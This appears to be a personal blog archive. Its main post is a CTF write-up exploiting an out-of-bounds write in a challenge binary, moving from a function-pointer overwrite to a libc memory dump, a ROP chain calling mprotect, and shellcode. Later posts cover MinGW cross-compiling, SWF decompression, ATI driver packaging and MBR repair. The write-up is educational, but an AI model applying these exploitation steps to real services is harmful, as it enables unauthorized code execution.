Monday, February 18, 2013

GITS'13 - back2skool Writeup

This past weekend I competed in GhostInTheShellcode Capture-The-Flag for the PwningYeti team. This is my write-up for the back2skool challenge. Due to time constraints and other responsibilities I was not able to finish the challenge before the CTF ended. These are my results running the executable on my own box. It should have worked on the actual service but computers are hard ;).

== Identifying The Vulnerability ==
The challenge consisted of a 32-bit ELF executable that listens on port 31337. First I connected to the service with netcat and was presented with a textual interface:
    __  ___      __  __   _____
   /  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
  / /|_/ / __ `/ __/ __ \\__ \/ _ \/ ___/ | / /
 / /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
Welcome to MathServ! The one-stop shop for all your arithmetic needs.
This program was written by a team of fresh CS graduates using only the most
agile of spiraling waterfall development methods, so rest assured there are
no bugs here!

Your current workspace is comprised of a 10-element table initialized as:
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

 read Read value from given index in table
 write Write value to given index in table
 func1 Change operation to addition
 func2 Change operation to multiplication
 math Perform math operation on table
 exit Quit and disconnect
From here I started to play around with the different commands, especially read and write. It didn't take very long to find the vulnerability:
Input position to read from:
Value at position 1: 1
Input position to read from:
Value at position 50: 0
Input position to read from:
Value at position -1: 0
Input position to write to:
Input numeric value to write:
Value at position: 1: 1
Input position to write to:
Table index too large!
Input position to write to:
Input numeric value to write:
Value at position -1: 5
We were told that we had a 10 element table but were able to read outside the bounds of the table and were also able to write outside the bounds of the table using negative numbers. At this point I guessed this was a signed comparison vulnerability. Further reverse engineering would confirm that this was in fact the result of a signed comparison when it should have been unsigned:
.text:080491F2                 lea     eax, [ebp+userData]
.text:080491F5                 mov     [esp], eax      ; nptr
.text:080491F8                 call    _atoi
.text:080491FD                 mov     dword ptr [ebp+index], eax
.text:08049200                 cmp     dword ptr [ebp+index], 9
.text:08049204                 jle     short loc_8049225
... snip ...
.text:08049266                 lea     eax, [ebp+userData]
.text:08049269                 mov     [esp], eax      ; nptr
.text:0804926C                 call    _atoi
.text:08049271                 mov     [ebp+value], eax
.text:08049274                 mov     eax, ds:(values_ptr - 804BF54h)[ebx]
.text:0804927A                 mov     edx, dword ptr [ebp+index]
.text:0804927D                 mov     ecx, [ebp+value]
.text:08049280                 mov     [eax+edx*4], ecx
Using this vulnerability we can write data of our choice to a nearly arbitrary address.

== Getting initial execution ==
Now that I had identified the vulnerability I just needed to find something to overwrite to get code execution. I did find it interesting that this executable was build with position independent code (-fPIC) but was not built as a position independent executable (-fPIE). You can see from the above assembly that IDA Pro shows the full address for each instruction instead of the offset, which it does for position independent executables. You could also check this using any number of scripts available on the internet. For us this means that the binary will not take advantage of ASLR. I assumed that the remote host this service was running on supported DEP.

Initially I tried overwriting pointers in the Global Offset Table (.got) which is listed as read/write in the section header but I found that after the executable was loaded the permissions were changed to read-only.

After a little more playing around with the executable I found that the user could choose between two functions that would perform a mathematical operation on the data (addition or multiplication). Then whenever the user issued the math command it would execute the chosen function. Looking at the math_doit function I found that this was implemented using a function pointer stored in global data. The only check on this value was to ensure it wasn't zero before calling the specified address. This means that we only need to overwrite the function pointer with an address of our choosing and send the math command to gain code execution.

Looking at the disassembly above you can see that the user specified index must be less than 9 and is multiplied by 4 to then added to the base address of the values array. To overwrite the math pointer field we need to supply an index which is negative and when multiplied by 4 will overflow a 32-bit register, resulting in our chosen offset from the values array. This is the calculation we will use to determine the index to read/write:
index = ((address - 0x804c040) / 4) | 0x80000000

Lets try it (index = -2147483634; value = 1094795585):
(gdb) c

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x804c040 134529088
ecx            0xffb7b400 -4738048
edx            0x41414141 1094795585
ebx            0x804bf54 134528852
esp            0xffb7b3bc 0xffb7b3bc
ebp            0xffb7b3e8 0xffb7b3e8
esi            0xffb7b456 -4737962
edi            0x8049ae0 134519520
eip            0x41414141 0x41414141
eflags         0x10206 [ PF IF RF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0 0
gs             0x63 99

== Defeating DEP ==
At this point we can direct execution to any address we choose but we still need to defeat DEP. After spending an hour looking through the gadgets in the binary it was suggested to me that I use gadgets from libc. But I likely didn't have the same libc that was on the target, so they suggested that I dump libc from memory. This seemed like an interesting idea and was something that I had never done before so I wrote some Python to dump the libc .text section. I started by reading the address of the send function from the .got table and then read the first 4 bytes from each page, decrementing the page address until I found the first page with the ELF magic value (\x7fELF). Then it read 0x800 bytes before disconnecting and re-connecting to read another 0x800 bytes, until the entire .text section was dumped to a file. I was never able to dump the entire remote libc because my connection kept getting dropped.

Once I had the bytes from libc I uploaded them to specifying "RAW binary" (otherwise will try to analyze it as a whole ELF file and that will fail). found 17983 gadgets, one of which was "xchg esp, eax; ret" which is perfect since when the math function pointer is called eax points to the beginning of the values array.

At this point we could try and find all the rop gadgets that would allow us to read the key from disk or we could just call mprotect to change the permissions of the .data section to read/write/execute. I choose to call mprotect. I found the address of mprotect by looking at the mprotect function in my local libc (because it had symbols) and then I used IDA Pro to search for the same bytes in the dumped libc data. This gave me the offset for mprotect in the remote libc. Then I wrote the following rop into the values array:
0x4d346b40 # mprotect (for my local libc)
0x804c000 # return
0x804c000 # addr
0x1   # length
0x07  # protections - rwx

== Grab The Goods And Run ==
At this point all you need to do is write some moderately small shellcode (there are only 64 bytes from the start of the .data section to the beginning of the values array) to the beginning of the .data section (0x804c000). I wrote some simple shellcode that called open, read, and write back to the open socket. You could guess the socket file descriptor or you could read it from memory (it's the 4 bytes before the math function pointer).

== Wrapping It Up ==
Like I mentioned before, I didn't actually solve the challenge during the CTF so I don't have the key. But I believe that everything would have worked on the remote service since it worked on an unmodified binary running on Fedora 15.

Thanks for taking the time to read this long blog post. Now get out there and solve some CTF challenges!

Tuesday, March 29, 2011

Compiling Windows Executables on Linux

For me Windows is like that girl that you want to forget about but you can't because she seems to be everywhere and too many people like her. As a software engineer you can't just leave windows behind because too many people still rely on it. If only there were a way that I could continue to use Linux but easily provide the same software for Windows.

What I'm talking about is cross compiling. It simply refers to compiling software to run on a target system that is different from the system running the compiler. This has been common in the Linux community and the embedded development communities for years. I'm going to describe the steps to installing cross compilers for Windows 32-bit and 64-bit on Fedora 14. I'm also going to show how to set-up Eclipse projects and create build configurations that will use the cross compilers to generate binary files that will run on Windows.

Thanks to Eric van Pienbroek and some other volunteers, Fedora 15 will be shipped with the MinGW64 (Minimum GNU tools for Windows x64) cross compiling toolchain. Until then you can install the compilers using the repository file from the Cross Compiler Framework wiki page. Alternatively this can be done from the command line with the following:

cd /etc/yum.repos.d
sudo wget

Now that the repository is set-up you can install the toolchain using the following command:

sudo yum install mingw32-gcc mingw32-gcc-c++ mingw64-gcc mingw64-gcc-c++

Congratulations you can now compile Windows executables from your Fedora machine! All of your favorite GCC tools are provided for working with Windows executables such as strip, nm, ar, and even GDB! All tools are prefixed with i686-w64-mingw32- or x86_64-w64-mingw32-. You can even build code using autoconf tools using the mingw32-configure and mingw64-configure tools. Continue reading if you want to learn how to set-up Eclipse projects to cross compile using your newly installed cross toolchain.

Open Eclipse and select new C++ project. For the project type select 'Empty Project' and 'Linux GCC' for the toolchain. While Eclipse does provide options 'Cross-Compile Project' and 'Cross GCC' I have found both lacking full support. For example, if you select a Cross GCC toolchain Eclipse will ask you for the prefix of the tool chain which in our case would be i686-w64-mingw32-. In the project options under 'C/C++ Build'-> 'Tool Chain Editor' you can select the tools you want to use to build the project and there are a few listed such as 'Cross G++ Compiler' and 'Cross GCC Compiler' but there is no cross archiver or cross assembler, even though these tools are supplied by the MinGW toolchain.

For this reason I suggest selecting the 'Linux GCC' toolchain. Then open the project options and under 'C/C++ Build' -> 'Settings' add the prefix i686-w64-mingw32- (or x86_64-w64-mingw32- for 64-bit executables) to each tools command.

Because these binaries are built with the MinGW32/64 they require libgcc_s_sjlj-1.dll to be distributed with the binary. The DLL can be found in the /usr/i686-w64-mingw32/sys-root/mingw/bin (or /usr/x86_64-w64-mingw32/sys-root/mingw/bin) directory. The extra DLL is required to for setjmp/longjmp C exception handling and is approximately 500K in size.

If you're not too worried about the size of your binaries you can have the linker statically link in this code, that way you won't have to distribute the shared DLL with your binary. To do this you need to tell the linker to statically link the binary. Open the project properties in Eclipse and select 'C/C++ Build' -> 'Settings' then select the 'Miscellaneous' option of the linker. Add the -static option to the 'Linker flags' text box.

When building binaries with C++ you will also be required to distribute libstdc++-6.dll with your binary. This is the standard C++ library and is quite large (~6MB). Like libgcc_s_sjlj-1.dll it can be statically compiled into your binary with the -static option to the linker. The resulting size of your binary will depend on how much of the standard library you happen to utilize.

Now that you can build Windows executables and DLL without leaving Linux, get out there and try it out! If you find that this is helpful don't forget to thank Erik van Pienbroek and the rest of the Fedora MinGW64 special interest group for all their hard work that has made this possible. If I have enough time and there is enough interest I will post about how to use GDB to debug the Windows binaries built with the MinGW64 toolchain.

Sunday, June 27, 2010

Decompressing Flash Files

For those of you who know me, you know that I tend to jump from interest to interest. Lately my interest has been reverse engineering, probably since I'm going to the ReCon conference in July. Anyway while surfing my RSS feeds the other day I came across a post that talked about an SWF disassembler plug-in for IDA Pro and yesterday I had some free time to play around with it.

After looking at the sample file provided I decided I wanted to look at a real flash application. Since I had Pandora running in the background I figured that it would be a perfect since I always wondered if I could extend the client or create my own. After a quick look at the page source I found the location of the SWF file.

<EMBED src=""

Using wget I downloaded the file and opened it up in IDA Pro. Unfortunately the SWF plug-in for IDA won't show any code because the file has been compressed and the plug-in does not know how to decompress the file. You can tell it's been compressed because the signature is CWS instead of FWS.

After a little googleing I found a ton of sites that offered me flash decompilers but I wasn't about to pay $80+ and the free options smelled of adware. After a little more searching I came across a blog post about Improving SWF Compression. In the post he describes how to compress SWF files and even provides an archive with tools and source. Since his intention was to use ZIP utilities to compress the SWF data he dumped the data out into a file, then zipped it and reinserted it into a compressed SWF file. Looking at his source it was easy to tweak it a little to extract the data from a compressed SWF file, decompress it, and recreate an uncompressed file that could be read by IDA's SWF plug-in.

The source code can be found here:

Updated: Added the link to the SWF plug-in.

On a side not I also discovered that you can embed the Pandora player in your own webpages, Click Here to see (click again to hide).

Friday, June 20, 2008

Catalyst 8.6 on Fedora 9 x86_64

    For those of us with ATI video cards running Linux, ATI is supporting us with a Linux version of their Catalyst drivers.  They can be downloaded by going to the ATI driver download page and selecting Linux x86_64 and the video card make and model.  From there you can download the self-extracting archive which will either install the driver or build a package.
    It is always a good idea to install from a package since they are easier to update and remove than by hand.    Unfortunately there are a few errors in the package and it will not build correctly on Fedora 9.  I was able to fix these errors and get the package to build although, I cannot use the driver since it has not been updated to work with the XOrg server contained in the Fedora 9 distro. But downgrading the XOrg server is another post.
    Once you have downloaded the self-extracting archive we must extract the files so that we can patch them.  To do this we use the --extract option of the archive.
./ --extract ati
Now that the files are extracted we must patch the .spec file that is used to specify the package build instructions.  Use ATI-fglrx.spec-tmpl.patch to patch the file fixing errors with files being included in the package but not listed as part of the installed files as well as an invalid changelog entry.
patch ./ati/packages/Fedora/ATI-fglrx.spec-tmpl < ./ATI-fglrx.spec-tmpl.patch
Next we must patch the a script used to create the directory structure for the package. There were some issues with the directories for the x86_64 build. will fix these errors allowing the package to build.
patch ./ati/packages/Fedora/ < ./
    Now that the files have been patched we can now build the package.
cd ati
./ 8-6 --buildpkg Fedora/F9
If all works out as planned you should see messages about 5 different packages created. Congratulations you have successfully build the Fedora 9 package! Now you can use yum to install the packages.
yum localinstall --nogpgcheck ATI-fglrx-8.501-1.f9.x86_64.rpm
yum localinstall --nogpgcheck ATI-fglrx-control-center-8.501-1.f9.x86_64.rpm
yum localinstall --nogpgcheck ATI-fglrx-IA32-libs-8.501-1.f9.x86_64.rpm
yum localinstall --nogpgcheck kernel-module-ATI-fglrx-
*Note - The ATI-fglrx-devel-8.501-1.f9.x86_64.rpm file is only required for development.
    As I said at the beginning of the post even after successfully building the Fedora 9 package, it will not work on the default Fedora 9 distro.  For the driver to work the XOrg server must be downgraded.  I have seen a few guides that describe how to downgrade the XOrg server to the version that came with Fedora 8 but I have not yet attempted this myself.

Sunday, June 8, 2008

Fixing the MBR

    This weekend I decided that I was going to load Fedora 9 onto my laptop and dual boot with Windows XP.  First of all I have a Toshiba Satellite A305-S6843 which is a great laptop and has never given me any problems.  I comes with an Intel T8100 (2.1 GHz), 4 GB RAM, 2x200 GB HD and an ATI Mobility Radeon HD 3470.  It originally came with Windows Vista but after only a month I was fed up with it and paid the $140 for the OEM Windows XP Pro x64.  I installed XP on the first 200GB HD leaving the second hard drive open.  So this weekend I decided that I would load Fedora 9 onto the second hard drive.
    After much frustration and searching (thats another story) I was able to get the live fedora 9 CD to boot and installed the OS that way.  Apparently I wasn't paying attention and told it to install grub on the boot sector for the second drive.  So when I restarted it booted directly into windows as if nothing had happened.  I was able to press F12 and use the BIOS's built-in boot manager to select the second hard drive and boot into linux that way.  For a while that was fine but then I decided that I would load grub into the MBR so that I could easily select which OS to boot.  I did it using the grub-install command
grub-install /dev/sda1
Oops!  I just overwrote the boot sector of the windows partition.  Consequently this also made it impossible to mount the ntfs partition or boot at all.  When trying to boot the MBR all that was displayed was 'GRUB'.
    At this point I was pretty sure that I had lost everything on the windows drive and would have to re-install Windows.  I just happened to stumble across a post by a guy who had a similar problem and he described how he fixed it using the Windows 98 SE boot disk.  This gave me the idea to use the Windows install CD and the recovery console.
Step 1:Insert the Windows XP install CD and restart the computer.
If your computer uses SATA with AHCI you will either need to set it to compatability mode in the BIOS or create a slipstream disk with the SATA drivers
Step 2:When the setup finishes loading drivers it will ask you if you want install the Windows XP operating system or if you want to use the Recovery console.  Press R to enter the recovery console.
Step 3:Use the fixmbr command to fix the master boot record.
Step 4:Use the fixboot command to fix the boot sector of the drive.
fixboot c:
Step 5:Exit the Recover console to restart the computer.
If you set the SATA to compatability don't forget to set it back in the BIOS.
Step 6:Boot into Linux and bring up the terminal.  Run the grub console.
Step 7:Set the root linux partition using the root command.  The root partition is set using the hard drive number.  For my system linux was installed on the second hard drive (hd1) and the first partition on that hard drive (0).
root (hd1,0)
You'll know you selected the correct partition when the grub console responds telling you it found the filesystem ext2fs.
Step 8:Tell grub to setup the MBR.
setup (hd0)
Step 9:The /etc/grub/grub.conf file will probably need to be edited to reflect the correct hard drives and paths.  I am not going to get into this here because there are plenty of tutorials on the internet about how to do this.
    That should allow you to use grub to boot into both Windows XP and Linux.